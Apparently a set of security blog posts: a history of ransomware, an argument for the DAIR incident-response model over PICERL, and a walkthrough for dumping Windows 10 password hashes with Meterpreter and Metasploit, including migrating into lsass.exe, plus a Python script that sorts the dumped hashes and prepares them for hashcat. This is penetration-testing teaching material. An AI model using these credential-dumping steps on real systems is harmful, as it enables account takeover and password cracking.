Akash Patel
- The Untold Origins and Evolution of Ransomware
Introduction
Everyone knows what ransomware is and what it does, but only a few are aware of its origins and history. Over the next few blogs, we'll dive deep into the journey of ransomware, its transformation over the years, and the RaaS (Ransomware as a Service) model.

The Real Definition of Ransomware
Many people still use the term "ransomware" to refer to what we should rather describe as an "encryptor payload." The ransomware payload is the portable executable (PE), typically a Windows executable (.exe) or a dynamic-link library (DLL), that performs the actual encryption. A ransomware attack, however, spans an entire campaign and has become its own realm of the overall cybercrime ecosystem.

The Evolution of Ransomware Payloads
Ransomware payloads have gone through several format changes over time:
- Lockers: Initially we had "lockers," which simply locked the machine so it could not be used. Some were simple and bypassable, relying merely on Microsoft's BlockInput API function to block keyboard and mouse input.
- Disk encryptors: Next came "disk encryptors," which encrypt an entire disk and so prevent it from being mounted or booted.
- File encryptors: Eventually the move was made to file encryptors, often referred to as "cryptor payloads" today. On darknet forums, especially those frequented by Russian-speaking actors, cryptor payloads are still often called by the old term "lockers."

The Payment Evolution
The first phase of lockers typically relied on gift cards and prepaid vouchers for payment. These cards could be bought anonymously, and the codes printed on them could easily be sent to the threat actors. Eventually, ransomware operators moved to demanding cryptocurrency, which is the norm today.

The First Known Ransomware: The AIDS Trojan
The first known ransomware was the "AIDS Trojan," also referred to as the "PC Cyborg Trojan." Authored by Joseph Popp, it was distributed in 1989 on floppy disks labeled "AIDS Information - Introductory Diskettes," mailed to attendees of the World Health Organization's AIDS conference. Once installed, the software waited a given number of boots before locking down the computer.

Fully Automated Ransomware (FAR)
Following the AIDS Trojan, ransomware families became what we now call fully automated ransomware (FAR). These families ran without human intervention once delivered. "FakeAV" lockers became commonplace: these payloads resembled antivirus products, yet when a user interacted with them, they would lock the computer, demand payment, and require calling a "support" number to fix the issue.

The Rise of Crypto-* Payloads
Eventually the Crypto-* named payloads became commonplace. CryptoLocker (2013) and CryptoWall (2014) were historically spread via email attachments. When a user opened the attachment, the payload encrypted the victim's files and demanded payment, typically in Bitcoin or in prepaid vouchers such as MoneyPak.

Human-Operated Ransomware (HumOR)
In early 2020, Microsoft coined the term "human-operated ransomware" (HumOR). Unlike automated ransomware, HumOR attacks are driven by humans rather than by auto-propagation. Human actors with "hands on the keyboard" carry out the intrusion, which often resembles an advanced persistent threat (APT) campaign. These attacks adapt to the environment and can inflict significant damage (credential theft, data exfiltration, backup destruction) before the ransomware payload is ever deployed.

Conclusion
Ransomware has evolved significantly from its origins with the AIDS Trojan to the sophisticated human-operated campaigns we see today. Understanding its history and evolution helps us better prepare for and defend against these threats. Stay tuned for our next blog, where we'll explore the RaaS model and its impact on the cybersecurity landscape.
Akash Patel
- Rethinking Incident Response: From PICERL to DAIR
Incident Response (IR) is a critical component of the cybersecurity landscape, commonly taught as PICERL: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned. While this framework is theoretically sound, many organizations struggle with its execution.

The Limitations of PICERL

Preparation
Preparation is foundational, but many organizations fail at the basic measures often called "Security 101." Common failures include:
- Poor implementation of least privilege and weak password policies.
- Lack of network monitoring and log aggregation.
- Insufficient use of threat intelligence.

Identification
A major issue in identification is that organizations limit their focus to the systems already known to be compromised, neglecting to sweep the rest of the network for the same indicators.

Containment
Containment is frequently skipped or poorly executed. Killing attacker processes without first collecting volatile evidence destroys the information needed to understand the incident, and improper scoping leads to incomplete containment, allowing the threat actor to persist in the environment.

Eradication
Incomplete eradication is a common issue. Without a comprehensive investigation, multiple footholds left by the threat actor go unnoticed. For instance, if a threat actor gains access through a VPN and installs remote access tools on several hosts, failing to identify every point of compromise leads to re-infection.

Recovery
Recovery tends to be more thorough because business operations are directly impacted.

Lessons Learned
During the lessons learned phase, organizations often fail to identify and fix all root causes. For example, if weak RDP credentials led to an incident, it is crucial to understand why such weaknesses were allowed and to address the underlying policy and enforcement issues, rather than just resetting one password.

Why We Need a Dynamic Approach
The static, linear nature of PICERL is one of its biggest limitations. Incident response is not a one-size-fits-all process. Multiple events can occur simultaneously, and a rigid sequence of phases leads to oversights. This calls for a more flexible and dynamic approach, such as the DAIR model.

Introducing the DAIR Model
The Dynamic Approach to Incident Response (DAIR) shifts from a linear to a fluid, outcome-focused model. Instead of viewing incident response as a series of steps, DAIR breaks it down into waypoints, outcomes, and activities.

Waypoints and Activities
- Preparation, Detection, Verification, and Triage: Detection is an ongoing activity, and verifying an incident is just one part of the process.
- Detection to Verification and Triage: Once an incident is detected, the next step is to verify it and perform initial triage. The initial actions differ significantly depending on the type of incident (e.g., ransomware vs. an insider threat).
- Ongoing Activities: Incident response is continuous. Activities such as evidence collection, hunting across systems, and vigilance continue until the desired outcomes are reached. Scoping, for instance, involves identifying compromised systems through evidence collection and network scanning.

Outcomes
- Scoping: Identifying compromised systems, which may require activities such as evidence collection and network scanning.
- Containment: Confining the threat to prevent further spread.
- Eradication: Removing the threat completely from the environment.
- Recovery: Restoring business operations to normal.
- Remediation: Addressing root causes to prevent recurrence.

Practical Steps to Apply DAIR
- Prepare: Establish robust security practices and ensure network monitoring and threat intelligence are in place.
- Detect: Implement continuous monitoring to detect incidents promptly.
- Verify and Triage: Quickly verify detected incidents and perform initial triage to guide the response.
- Scope, Contain, Eradicate, Recover, and Remediate: Work toward each outcome while continuously communicating with decision-makers.
- Learn and Improve: Analyze each incident to identify root causes and improve security measures to prevent future incidents.

Conclusion
Transitioning from PICERL to DAIR offers a more dynamic and adaptable incident response model. By focusing on waypoints, outcomes, and continuous activities, organizations can better manage the complexities of modern threats. Incident response is an ongoing process, and vigilance is key to maintaining a secure environment.
Akash Patel
- Obtaining Windows 10 Password Hashes
Gaining access to local password hashes on a Windows 10 system can be crucial for an attacker who wants to crack or pass the hash. Two methods are discussed here: the Meterpreter hashdump command and the Metasploit smart_hashdump post module. Both require a Meterpreter session that runs with SYSTEM privileges, or one that can obtain them by migrating into a SYSTEM process.

Method 1: Using Meterpreter hashdump

Step-by-step process:

1. Initial attempt to dump hashes:

    meterpreter > hashdump

   On a current Windows 10 host this frequently fails, typically because the session's process lacks the privileges needed to read the SAM:

    [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

2. Identify the lsass.exe process:

    meterpreter > ps -S lsass.exe

3. Migrate into lsass.exe (the PID is the one returned in step 2):

    meterpreter > migrate 620
    [*] Migrating from 1248 to 620 ...
    [*] Migration completed successfully.

4. Dump the hashes again after migration:

    meterpreter > hashdump

Note: If migration fails, you may need to migrate to another SYSTEM process first and then into lsass.exe. Migrating into lsass.exe is also the noisiest option: opening lsass.exe with the access rights that injection needs is exactly what EDR products and Sysmon (Event ID 10, ProcessAccess) alert on, LSA Protection (RunAsPPL) blocks the injection outright, and if the injected code crashes lsass.exe the host reboots.

Method 2: Using the Metasploit smart_hashdump Module

Step-by-step process:

1. Identify a SYSTEM process:

    meterpreter > ps -A x64 -a

   Choose a process running as NT AUTHORITY\SYSTEM (avoid svchost.exe).

2. Migrate to the chosen process:

    meterpreter > migrate 1404
    [*] Migrating from 448 to 1404 ...
    [*] Migration completed successfully.

3. Run smart_hashdump:

    meterpreter > run post/windows/gather/smart_hashdump

   On success the module prints the hashes and also stores them as loot in the Metasploit database (the output is not reproduced here).

Advantages of smart_hashdump:
- Attempts to retrieve both local account hashes and, if the target is a domain controller, domain account hashes.
- When running as SYSTEM on a workstation or member server it reads the SAM through the registry rather than injecting into lsass.exe, which avoids some of the limitations and noise of dumping directly from lsass.exe.

Conclusion
Using Meterpreter's hashdump and Metasploit's smart_hashdump module, attackers can effectively extract password hashes from Windows 10 systems. To be continued in the next blog.
Akash Patel
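Both modules print the hashes in pwdump format (user:RID:LM:NT:::). As an added example, not code from the original post or from Metasploit, the Python below parses that output and performs the triage a tester does next: flagging accounts with an empty password, accounts that still carry a real LM hash (a legacy, trivially crackable format), and accounts that share the same NT hash (password reuse), then emitting one line per unique hash for hashcat mode 1000. The sample dump is constructed; the hash values in it are the well-known test vectors for the empty string and for "password", not hashes from a real host.

```python
"""Triage helper for pwdump-style output from Meterpreter's hashdump / smart_hashdump.

Added example, not part of the original post. SAMPLE_HASHDUMP is constructed
for illustration; its hashes are public test vectors, not dumped from a real machine.
"""
import re
from dataclasses import dataclass

# Placeholder stored in the LM field when LM hash storage is disabled (Windows 10 default)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: the account has no password set
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:RID:LM:NT::: is the pwdump line format both modules print
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample: a Meterpreter status line followed by five SAM entries.
# 8846f7ea... is NT("password"); e52cac67... is LM("PASSWORD").
SAMPLE_HASHDUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
legacy_svc:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""


@dataclass(frozen=True)
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def has_lm_hash(self) -> bool:
        # A real LM hash means the password is at most 14 characters and cracks in minutes
        return self.lm != EMPTY_LM

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def is_builtin(self) -> bool:
        # RIDs below 1000 are well-known accounts (500 Administrator, 501 Guest, ...)
        return self.rid < 1000


def parse_hashdump(text: str) -> list[SamEntry]:
    """Extract SAM entries, ignoring Meterpreter status lines such as '[*] ...'."""
    entries = []
    for raw in text.splitlines():
        m = PWDUMP_RE.match(raw.strip())
        if m:
            entries.append(SamEntry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def crackable_nt_hashes(entries: list[SamEntry]) -> dict[str, list[str]]:
    """Map each distinct NT hash to the users that share it, skipping empty-password
    accounts. A shared hash means a shared password: crack it once, reuse it everywhere."""
    shared: dict[str, list[str]] = {}
    for e in entries:
        if e.empty_password:
            continue
        shared.setdefault(e.nt, []).append(e.user)
    return shared


def hashcat_lines(entries: list[SamEntry]) -> list[str]:
    """'user:NT' lines for `hashcat -m 1000 --username`, one per unique hash."""
    return [f"{users[0]}:{nt}" for nt, users in crackable_nt_hashes(entries).items()]


def summarize(entries: list[SamEntry]) -> dict[str, list[str]]:
    """The findings worth reporting from a SAM dump."""
    return {
        "empty_password": [e.user for e in entries if e.empty_password],
        "lm_hash_present": [e.user for e in entries if e.has_lm_hash],
        "shared_password": [u for users in crackable_nt_hashes(entries).values()
                            if len(users) > 1 for u in users],
    }


if __name__ == "__main__":
    sam = parse_hashdump(SAMPLE_HASHDUMP)
    for finding, users in summarize(sam).items():
        print(f"{finding}: {users}")
    print("\n".join(hashcat_lines(sam)))
```

On the constructed sample the script reports Administrator and Guest as having no password, legacy_svc as still storing an LM hash, and alice, bob and legacy_svc as sharing one password, so only one NT hash needs to go to hashcat. The same parser works on smart_hashdump's loot file, since it writes the same user:RID:LM:NT::: lines.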


